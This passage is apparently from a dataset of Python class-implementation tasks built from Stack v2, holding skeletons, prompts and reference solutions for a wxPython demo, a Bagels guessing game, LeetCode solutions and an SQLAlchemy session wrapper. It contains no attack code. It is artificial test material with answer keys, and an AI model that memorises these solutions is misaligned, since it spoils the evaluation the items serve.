Computation.\"\"\"\n <|body_1|>\n\n def OnStop(self, event):\n \"\"\"Stop Computation.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n wx.Frame.__init__(self, parent, id, 'wxYield Test')\n wx.Button(self, ID_START, 'Start', pos=(0, 0))\n wx.Button(self, ID_STOP, 'Stop', pos=(0, 50))\n self.status = wx.StaticText(self, -1, '', pos=(0, 100))\n self.Bind(wx.EVT_BUTTON, self.OnStart, id=ID_START)\n self.Bind(wx.EVT_BUTTON, self.OnStop, id=ID_STOP)\n self.working = 0\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.working:\n self.status.SetLabel('Starting Computation')\n self.working = 1\n self.need_abort = 0\n for i in range(10):\n time.sleep(1)\n wx.Yield()\n if self.need_abort:\n self.status.SetLabel('Computation aborted')\n break\n else:\n self.status.SetLabel('Computation Completed')\n self.working = 0\n<|end_body_1|>\n\n<|body_start_2|>\n if self.working:\n self.status.SetLabel('Trying to abort computation')\n self.need_abort = 1\n<|end_body_2|>\n", "revision_id": "979436525c57fdaeaa832e960985e0406e123587", "skeleton": "<|skeleton|>\nclass MainFrame:\n \"\"\"Class MainFrame.\"\"\"\n\n def __init__(self, parent, id):\n \"\"\"Create the MainFrame.\"\"\"\n <|body_0|>\n\n def OnStart(self, event):\n \"\"\"Start Computation.\"\"\"\n <|body_1|>\n\n def OnStop(self, event):\n \"\"\"Stop Computation.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MainFrame:\n \"\"\"Class MainFrame.\"\"\"\n\n def __init__(self, parent, id):\n \"\"\"Create the MainFrame.\"\"\"\n wx.Frame.__init__(self, parent, id, 'wxYield Test')\n wx.Button(self, ID_START, 'Start', pos=(0, 0))\n wx.Button(self, ID_STOP, 'Stop', pos=(0, 50))\n self.status = wx.StaticText(self, -1, '', pos=(0, 100))\n self.Bind(wx.EVT_BUTTON, self.OnStart, id=ID_START)\n self.Bind(wx.EVT_BUTTON, self.OnStop, id=ID_STOP)\n self.working = 0\n\n def OnStart(self, event):\n \"\"\"Start Computation.\"\"\"\n if not self.working:\n self.status.SetLabel('Starting Computation')\n self.working = 1\n self.need_abort = 0\n for i in range(10):\n time.sleep(1)\n wx.Yield()\n if self.need_abort:\n self.status.SetLabel('Computation aborted')\n break\n else:\n self.status.SetLabel('Computation Completed')\n self.working = 0\n\n def OnStop(self, event):\n \"\"\"Stop Computation.\"\"\"\n if self.working:\n self.status.SetLabel('Trying to abort computation')\n self.need_abort = 1\n", "source": "the_stack_v2_python_sparse", "source_path": "Research/wx doco/somelongthread2_yield.py", "source_repo": "abulka/pynsource", "split": "test", "star_events_count": 271} {"blob_id": "69dabb5cae8f3acf96361909db046b93be96c126", "bodies": ["self.digits = digits\nself.number_of_guesses = 0\nif guesser == 'human':\n self.chosen_number = self.create_num(digits)", "final_number = []\nfirst_digit = randrange(1, 10)\nfinal_number.append(first_digit)\ninfinite_loop_prevention = 0\nwhile len(final_number) < digits:\n infinite_loop_prevention += 1\n if infinite_loop_prevention > 10:\n raise Exception('Infinite loop detected!')\n new_digit = randrange(0, 10)\n if new_digit not in final_number:\n final_number.append(new_digit)\nreturn final_number", "self.number_of_guesses += 1\ncodewords = []\ndigits_place = 0\nwhile digits_place < self.digits:\n if human_guess[digits_place] == self.chosen_number[digits_place]:\n codewords.insert(0, 'Fermi')\n elif human_guess[digits_place] in self.chosen_number:\n codewords.insert(0, 'Pico')\n digits_place += 1\nif len(codewords) == 0:\n codewords.insert(0, 'Bagels')\nreturn codewords"], "bodies_text": "<|body_start_0|>\n self.digits = digits\n self.number_of_guesses = 0\n if guesser == 'human':\n self.chosen_number = self.create_num(digits)\n<|end_body_0|>\n\n<|body_start_1|>\n final_number = []\n first_digit = randrange(1, 10)\n final_number.append(first_digit)\n infinite_loop_prevention = 0\n while len(final_number) < digits:\n infinite_loop_prevention += 1\n if infinite_loop_prevention > 10:\n raise Exception('Infinite loop detected!')\n new_digit = randrange(0, 10)\n if new_digit not in final_number:\n final_number.append(new_digit)\n return final_number\n<|end_body_1|>\n\n<|body_start_2|>\n self.number_of_guesses += 1\n codewords = []\n digits_place = 0\n while digits_place < self.digits:\n if human_guess[digits_place] == self.chosen_number[digits_place]:\n codewords.insert(0, 'Fermi')\n elif human_guess[digits_place] in self.chosen_number:\n codewords.insert(0, 'Pico')\n digits_place += 1\n if len(codewords) == 0:\n codewords.insert(0, 'Bagels')\n return codewords\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Game", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Game:\n\n def __init__(self, guesser='human', digits=3):\n \"\"\"Each game stores the number of guesses as an attribute. You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.\"\"\"\n <|body_0|>\n\n def create_num(self, digits):\n \"\"\"This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.\"\"\"\n <|body_1|>\n\n def compare_guess(self, human_guess):\n \"\"\"This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.digits = digits\n self.number_of_guesses = 0\n if guesser == 'human':\n self.chosen_number = self.create_num(digits)\n<|end_body_0|>\n\n<|body_start_1|>\n final_number = []\n first_digit = randrange(1, 10)\n final_number.append(first_digit)\n infinite_loop_prevention = 0\n while len(final_number) < digits:\n infinite_loop_prevention += 1\n if infinite_loop_prevention > 10:\n raise Exception('Infinite loop detected!')\n new_digit = randrange(0, 10)\n if new_digit not in final_number:\n final_number.append(new_digit)\n return final_number\n<|end_body_1|>\n\n<|body_start_2|>\n self.number_of_guesses += 1\n codewords = []\n digits_place = 0\n while digits_place < self.digits:\n if human_guess[digits_place] == self.chosen_number[digits_place]:\n codewords.insert(0, 'Fermi')\n elif human_guess[digits_place] in self.chosen_number:\n codewords.insert(0, 'Pico')\n digits_place += 1\n if len(codewords) == 0:\n codewords.insert(0, 'Bagels')\n return codewords\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000142", "length_bytes": 9238, "license_type": "no_license", "methods": [{"docstring": "Each game stores the number of guesses as an attribute. You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.", "name": "__init__", "signature": "def __init__(self, guesser='human', digits=3)"}, {"docstring": "This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.", "name": "create_num", "signature": "def create_num(self, digits)"}, {"docstring": "This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.", "name": "compare_guess", "signature": "def compare_guess(self, human_guess)"}], "n_methods": 3, "prompt": "Implement the Python class `Game` described below.\n\nClass description:\nImplement the Game class.\n\nMethod signatures and docstrings:\n- def __init__(self, guesser='human', digits=3): Each game stores the number of guesses as an attribute. You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.\n- def create_num(self, digits): This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.\n- def compare_guess(self, human_guess): This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.", "prompted_full_text": "Implement the Python class `Game` described below.\n\nClass description:\nImplement the Game class.\n\nMethod signatures and docstrings:\n- def __init__(self, guesser='human', digits=3): Each game stores the number of guesses as an attribute. You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.\n- def create_num(self, digits): This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.\n- def compare_guess(self, human_guess): This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.\n\n<|skeleton|>\nclass Game:\n\n def __init__(self, guesser='human', digits=3):\n \"\"\"Each game stores the number of guesses as an attribute. You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.\"\"\"\n <|body_0|>\n\n def create_num(self, digits):\n \"\"\"This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.\"\"\"\n <|body_1|>\n\n def compare_guess(self, human_guess):\n \"\"\"This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.digits = digits\n self.number_of_guesses = 0\n if guesser == 'human':\n self.chosen_number = self.create_num(digits)\n<|end_body_0|>\n\n<|body_start_1|>\n final_number = []\n first_digit = randrange(1, 10)\n final_number.append(first_digit)\n infinite_loop_prevention = 0\n while len(final_number) < digits:\n infinite_loop_prevention += 1\n if infinite_loop_prevention > 10:\n raise Exception('Infinite loop detected!')\n new_digit = randrange(0, 10)\n if new_digit not in final_number:\n final_number.append(new_digit)\n return final_number\n<|end_body_1|>\n\n<|body_start_2|>\n self.number_of_guesses += 1\n codewords = []\n digits_place = 0\n while digits_place < self.digits:\n if human_guess[digits_place] == self.chosen_number[digits_place]:\n codewords.insert(0, 'Fermi')\n elif human_guess[digits_place] in self.chosen_number:\n codewords.insert(0, 'Pico')\n digits_place += 1\n if len(codewords) == 0:\n codewords.insert(0, 'Bagels')\n return codewords\n<|end_body_2|>\n", "revision_id": "beadb0cd62c8f3b4fc1f47f2975e97e939e8419e", "skeleton": "<|skeleton|>\nclass Game:\n\n def __init__(self, guesser='human', digits=3):\n \"\"\"Each game stores the number of guesses as an attribute. You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.\"\"\"\n <|body_0|>\n\n def create_num(self, digits):\n \"\"\"This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.\"\"\"\n <|body_1|>\n\n def compare_guess(self, human_guess):\n \"\"\"This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Game:\n def __init__(self, guesser='human', digits=3):\n \"\"\"Each game stores the number of guesses as an attribute. You will be able to choose whether the human player or the computer player will be the guesser and it will change how the game is played.\"\"\"\n self.digits = digits\n self.number_of_guesses = 0\n if guesser == 'human':\n self.chosen_number = self.create_num(digits)\n\n def create_num(self, digits):\n \"\"\"This method generates a random number of a specified number of digits (3 to start). No digits can repeat, and the number cannot start with 0. The digits are stored as a list so it's easier to iterate through them and compare them to human guesses.\"\"\"\n final_number = []\n first_digit = randrange(1, 10)\n final_number.append(first_digit)\n infinite_loop_prevention = 0\n while len(final_number) < digits:\n infinite_loop_prevention += 1\n if infinite_loop_prevention > 10:\n raise Exception('Infinite loop detected!')\n new_digit = randrange(0, 10)\n if new_digit not in final_number:\n final_number.append(new_digit)\n return final_number\n\n def compare_guess(self, human_guess):\n \"\"\"This method takes the human player's guess and compares the digits and indices to those in the random number the computer chose. It returns the code words \"Bagel,\" \"Pico,\" and/or \"Fermi\" based on whether any digits are right or in the right place.\"\"\"\n self.number_of_guesses += 1\n codewords = []\n digits_place = 0\n while digits_place < self.digits:\n if human_guess[digits_place] == self.chosen_number[digits_place]:\n codewords.insert(0, 'Fermi')\n elif human_guess[digits_place] in self.chosen_number:\n codewords.insert(0, 'Pico')\n digits_place += 1\n if len(codewords) == 0:\n codewords.insert(0, 'Bagels')\n return codewords\n", "source": "the_stack_v2_python_sparse", "source_path": "StudentWork/RachelKlein/bagels.py", "source_repo": "kevinelong/PM_2015_SUMMER", "split": "test", "star_events_count": 4} {"blob_id": "3d9a4fa16551d9863e59c4f1b1e980c4b2943ae9", "bodies": ["def recur(root, k, hashset):\n if not root:\n return False\n target = k - root.val\n if target in hashset:\n return True\n else:\n hashset.add(root.val)\n return recur(root.left, k, hashset) or recur(root.right, k, hashset)\nhashset = set()\nreturn recur(root, k, hashset)", "if not root:\n return []\ndic = set()\nflag = False\n\ndef inorder(root):\n if root:\n inorder(root.left)\n if k - root.val in dic:\n nonlocal flag\n flag = True\n return\n dic.add(root.val)\n inorder(root.right)\ninorder(root)\nreturn flag"], "bodies_text": "<|body_start_0|>\n def recur(root, k, hashset):\n if not root:\n return False\n target = k - root.val\n if target in hashset:\n return True\n else:\n hashset.add(root.val)\n return recur(root.left, k, hashset) or recur(root.right, k, hashset)\n hashset = set()\n return recur(root, k, hashset)\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return []\n dic = set()\n flag = False\n\n def inorder(root):\n if root:\n inorder(root.left)\n if k - root.val in dic:\n nonlocal flag\n flag = True\n return\n dic.add(root.val)\n inorder(root.right)\n inorder(root)\n return flag\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def findTarget1(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:回溯+剪枝\"\"\"\n <|body_0|>\n\n def findTarget2(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:通过flag来标记是否已找到\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def recur(root, k, hashset):\n if not root:\n return False\n target = k - root.val\n if target in hashset:\n return True\n else:\n hashset.add(root.val)\n return recur(root.left, k, hashset) or recur(root.right, k, hashset)\n hashset = set()\n return recur(root, k, hashset)\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return []\n dic = set()\n flag = False\n\n def inorder(root):\n if root:\n inorder(root.left)\n if k - root.val in dic:\n nonlocal flag\n flag = True\n return\n dic.add(root.val)\n inorder(root.right)\n inorder(root)\n return flag\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000143", "length_bytes": 1757, "license_type": "no_license", "methods": [{"docstring": "思路:回溯+剪枝", "name": "findTarget1", "signature": "def findTarget1(self, root: TreeNode, k: int) -> bool"}, {"docstring": "思路:通过flag来标记是否已找到", "name": "findTarget2", "signature": "def findTarget2(self, root: TreeNode, k: int) -> bool"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002339", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findTarget1(self, root: TreeNode, k: int) -> bool: 思路:回溯+剪枝\n- def findTarget2(self, root: TreeNode, k: int) -> bool: 思路:通过flag来标记是否已找到", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findTarget1(self, root: TreeNode, k: int) -> bool: 思路:回溯+剪枝\n- def findTarget2(self, root: TreeNode, k: int) -> bool: 思路:通过flag来标记是否已找到\n\n<|skeleton|>\nclass Solution:\n\n def findTarget1(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:回溯+剪枝\"\"\"\n <|body_0|>\n\n def findTarget2(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:通过flag来标记是否已找到\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n def recur(root, k, hashset):\n if not root:\n return False\n target = k - root.val\n if target in hashset:\n return True\n else:\n hashset.add(root.val)\n return recur(root.left, k, hashset) or recur(root.right, k, hashset)\n hashset = set()\n return recur(root, k, hashset)\n<|end_body_0|>\n\n<|body_start_1|>\n if not root:\n return []\n dic = set()\n flag = False\n\n def inorder(root):\n if root:\n inorder(root.left)\n if k - root.val in dic:\n nonlocal flag\n flag = True\n return\n dic.add(root.val)\n inorder(root.right)\n inorder(root)\n return flag\n<|end_body_1|>\n", "revision_id": "e43ee86c5a8cdb808da09b4b6138e10275abadb5", "skeleton": "<|skeleton|>\nclass Solution:\n\n def findTarget1(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:回溯+剪枝\"\"\"\n <|body_0|>\n\n def findTarget2(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:通过flag来标记是否已找到\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def findTarget1(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:回溯+剪枝\"\"\"\n def recur(root, k, hashset):\n if not root:\n return False\n target = k - root.val\n if target in hashset:\n return True\n else:\n hashset.add(root.val)\n return recur(root.left, k, hashset) or recur(root.right, k, hashset)\n hashset = set()\n return recur(root, k, hashset)\n\n def findTarget2(self, root: TreeNode, k: int) -> bool:\n \"\"\"思路:通过flag来标记是否已找到\"\"\"\n if not root:\n return []\n dic = set()\n flag = False\n\n def inorder(root):\n if root:\n inorder(root.left)\n if k - root.val in dic:\n nonlocal flag\n flag = True\n return\n dic.add(root.val)\n inorder(root.right)\n inorder(root)\n return flag\n", "source": "the_stack_v2_python_sparse", "source_path": "LeetCode/树(Binary Tree)/653. 两数之和 IV - 输入 BST.py", "source_repo": "yiming1012/MyLeetCode", "split": "test", "star_events_count": 2} {"blob_id": "5b52c4153f231b0efb645d96d5aee78fa6c47785", "bodies": ["i = len(nums) - 2\nwhile i >= 0 and nums[i] >= nums[i + 1]:\n i -= 1\nif i >= 0:\n j = len(nums) - 1\n while j >= 0 and nums[i] >= nums[j]:\n j -= 1\n nums[i], nums[j] = (nums[j], nums[i])\nleft, right = (i + 1, len(nums) - 1)\nwhile left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1", "print('origin nums:{0}'.format(nums))\nn = len(nums)\nmax_num = nums[-1]\nsign = True\nfor i in range(2, n + 1):\n if nums[-i] < nums[-i + 1]:\n sign = False\n j = -i + 1\n while j < 0:\n if nums[j] <= nums[-i]:\n break\n j += 1\n break\nif sign:\n nums.reverse()\n print('nums1:{0}'.format(nums))\nelse:\n nums[-i], nums[j - 1] = (nums[j - 1], nums[-i])\n nums[-i + 1:] = nums[-i + 1:][::-1]\n print('nums2:{0}'.format(nums))"], "bodies_text": "<|body_start_0|>\n i = len(nums) - 2\n while i >= 0 and nums[i] >= nums[i + 1]:\n i -= 1\n if i >= 0:\n j = len(nums) - 1\n while j >= 0 and nums[i] >= nums[j]:\n j -= 1\n nums[i], nums[j] = (nums[j], nums[i])\n left, right = (i + 1, len(nums) - 1)\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n<|end_body_0|>\n\n<|body_start_1|>\n print('origin nums:{0}'.format(nums))\n n = len(nums)\n max_num = nums[-1]\n sign = True\n for i in range(2, n + 1):\n if nums[-i] < nums[-i + 1]:\n sign = False\n j = -i + 1\n while j < 0:\n if nums[j] <= nums[-i]:\n break\n j += 1\n break\n if sign:\n nums.reverse()\n print('nums1:{0}'.format(nums))\n else:\n nums[-i], nums[j - 1] = (nums[j - 1], nums[-i])\n nums[-i + 1:] = nums[-i + 1:][::-1]\n print('nums2:{0}'.format(nums))\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def nextPermutation(self, nums: List[int]):\n \"\"\"方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:\"\"\"\n <|body_0|>\n\n def nextPermutation1(self, nums: List[int]):\n \"\"\":type nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n i = len(nums) - 2\n while i >= 0 and nums[i] >= nums[i + 1]:\n i -= 1\n if i >= 0:\n j = len(nums) - 1\n while j >= 0 and nums[i] >= nums[j]:\n j -= 1\n nums[i], nums[j] = (nums[j], nums[i])\n left, right = (i + 1, len(nums) - 1)\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n<|end_body_0|>\n\n<|body_start_1|>\n print('origin nums:{0}'.format(nums))\n n = len(nums)\n max_num = nums[-1]\n sign = True\n for i in range(2, n + 1):\n if nums[-i] < nums[-i + 1]:\n sign = False\n j = -i + 1\n while j < 0:\n if nums[j] <= nums[-i]:\n break\n j += 1\n break\n if sign:\n nums.reverse()\n print('nums1:{0}'.format(nums))\n else:\n nums[-i], nums[j - 1] = (nums[j - 1], nums[-i])\n nums[-i + 1:] = nums[-i + 1:][::-1]\n print('nums2:{0}'.format(nums))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000144", "length_bytes": 2561, "license_type": "no_license", "methods": [{"docstring": "方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:", "name": "nextPermutation", "signature": "def nextPermutation(self, nums: List[int])"}, {"docstring": ":type nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.", "name": "nextPermutation1", "signature": "def nextPermutation1(self, nums: List[int])"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def nextPermutation(self, nums: List[int]): 方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:\n- def nextPermutation1(self, nums: List[int]): :type nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def nextPermutation(self, nums: List[int]): 方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:\n- def nextPermutation1(self, nums: List[int]): :type nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.\n\n<|skeleton|>\nclass Solution:\n\n def nextPermutation(self, nums: List[int]):\n \"\"\"方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:\"\"\"\n <|body_0|>\n\n def nextPermutation1(self, nums: List[int]):\n \"\"\":type nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n i = len(nums) - 2\n while i >= 0 and nums[i] >= nums[i + 1]:\n i -= 1\n if i >= 0:\n j = len(nums) - 1\n while j >= 0 and nums[i] >= nums[j]:\n j -= 1\n nums[i], nums[j] = (nums[j], nums[i])\n left, right = (i + 1, len(nums) - 1)\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n<|end_body_0|>\n\n<|body_start_1|>\n print('origin nums:{0}'.format(nums))\n n = len(nums)\n max_num = nums[-1]\n sign = True\n for i in range(2, n + 1):\n if nums[-i] < nums[-i + 1]:\n sign = False\n j = -i + 1\n while j < 0:\n if nums[j] <= nums[-i]:\n break\n j += 1\n break\n if sign:\n nums.reverse()\n print('nums1:{0}'.format(nums))\n else:\n nums[-i], nums[j - 1] = (nums[j - 1], nums[-i])\n nums[-i + 1:] = nums[-i + 1:][::-1]\n print('nums2:{0}'.format(nums))\n<|end_body_1|>\n", "revision_id": "f831fd9603592ae5bee3679924f962a3ebce381c", "skeleton": "<|skeleton|>\nclass Solution:\n\n def nextPermutation(self, nums: List[int]):\n \"\"\"方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:\"\"\"\n <|body_0|>\n\n def nextPermutation1(self, nums: List[int]):\n \"\"\":type nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def nextPermutation(self, nums: List[int]):\n \"\"\"方法一:两遍扫描【官方解】 目标:一个大于当前序列的新序列,且变大的幅度尽可能小 解析:\"\"\"\n i = len(nums) - 2\n while i >= 0 and nums[i] >= nums[i + 1]:\n i -= 1\n if i >= 0:\n j = len(nums) - 1\n while j >= 0 and nums[i] >= nums[j]:\n j -= 1\n nums[i], nums[j] = (nums[j], nums[i])\n left, right = (i + 1, len(nums) - 1)\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n\n def nextPermutation1(self, nums: List[int]):\n \"\"\":type nums: List[int] :rtype: void Do not return anything, modify nums in-place instead.\"\"\"\n print('origin nums:{0}'.format(nums))\n n = len(nums)\n max_num = nums[-1]\n sign = True\n for i in range(2, n + 1):\n if nums[-i] < nums[-i + 1]:\n sign = False\n j = -i + 1\n while j < 0:\n if nums[j] <= nums[-i]:\n break\n j += 1\n break\n if sign:\n nums.reverse()\n print('nums1:{0}'.format(nums))\n else:\n nums[-i], nums[j - 1] = (nums[j - 1], nums[-i])\n nums[-i + 1:] = nums[-i + 1:][::-1]\n print('nums2:{0}'.format(nums))\n", "source": "the_stack_v2_python_sparse", "source_path": "topic23_math/T31_nextPermutation/interview.py", "source_repo": "GongFuXiong/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "b90ededd96737aa333edb07d1a2a78a2577707cc", "bodies": ["self.logger = logging.getLogger('core.Session')\nself.maker = session_maker\nif isinstance(session_maker, Session):\n self.maker = session_maker.maker", "session = self.maker()\ntry:\n yield session\n session.commit()\nexcept Skip:\n session.rollback()\n raise\nexcept Exception:\n self.logger.error('Transaction failed. Rolling back.')\n session.rollback()\n raise\nfinally:\n session.close()"], "bodies_text": "<|body_start_0|>\n self.logger = logging.getLogger('core.Session')\n self.maker = session_maker\n if isinstance(session_maker, Session):\n self.maker = session_maker.maker\n<|end_body_0|>\n\n<|body_start_1|>\n session = self.maker()\n try:\n yield session\n session.commit()\n except Skip:\n session.rollback()\n raise\n except Exception:\n self.logger.error('Transaction failed. Rolling back.')\n session.rollback()\n raise\n finally:\n session.close()\n<|end_body_1|>\n", "class_docstring": "A wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.", "class_name": "Session", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Session:\n \"\"\"A wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.\"\"\"\n\n def __init__(self, session_maker):\n \"\"\"Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.\"\"\"\n <|body_0|>\n\n def __call__(self):\n \"\"\"Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. Yields ------ session : Session A session that will be closed outside of the context.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.logger = logging.getLogger('core.Session')\n self.maker = session_maker\n if isinstance(session_maker, Session):\n self.maker = session_maker.maker\n<|end_body_0|>\n\n<|body_start_1|>\n session = self.maker()\n try:\n yield session\n session.commit()\n except Skip:\n session.rollback()\n raise\n except Exception:\n self.logger.error('Transaction failed. Rolling back.')\n session.rollback()\n raise\n finally:\n session.close()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000145", "length_bytes": 1777, "license_type": "no_license", "methods": [{"docstring": "Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.", "name": "__init__", "signature": "def __init__(self, session_maker)"}, {"docstring": "Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. Yields ------ session : Session A session that will be closed outside of the context.", "name": "__call__", "signature": "def __call__(self)"}], "n_methods": 2, "prompt": "Implement the Python class `Session` described below.\n\nClass description:\nA wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.\n\nMethod signatures and docstrings:\n- def __init__(self, session_maker): Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.\n- def __call__(self): Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. Yields ------ session : Session A session that will be closed outside of the context.", "prompted_full_text": "Implement the Python class `Session` described below.\n\nClass description:\nA wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- logger : logging.Logger The logger object. maker : sqlalchemy.orm.session.Session A session maker.\n\nMethod signatures and docstrings:\n- def __init__(self, session_maker): Create a new Session object. Parameter --------- session_maker : Session or sqlalchemy.orm.session.Session The session wrapper to use.\n- def __call__(self): Context handler for the session. This creates a new session and yields it. It will catch, log, and re raise any exceptions that occur. It will also commit and close all sessions. In the case of an error it will rollback the session. Yields ------ session : Session A session that will be closed outside of the context.\n\n<|skeleton|>\nclass Session:\n \"\"\"A wrapper around a session maker to provide the types of logging and rollbacks that we desire. It is callable and works as a context handler to manage sessions when doing so. Attributes ---------- 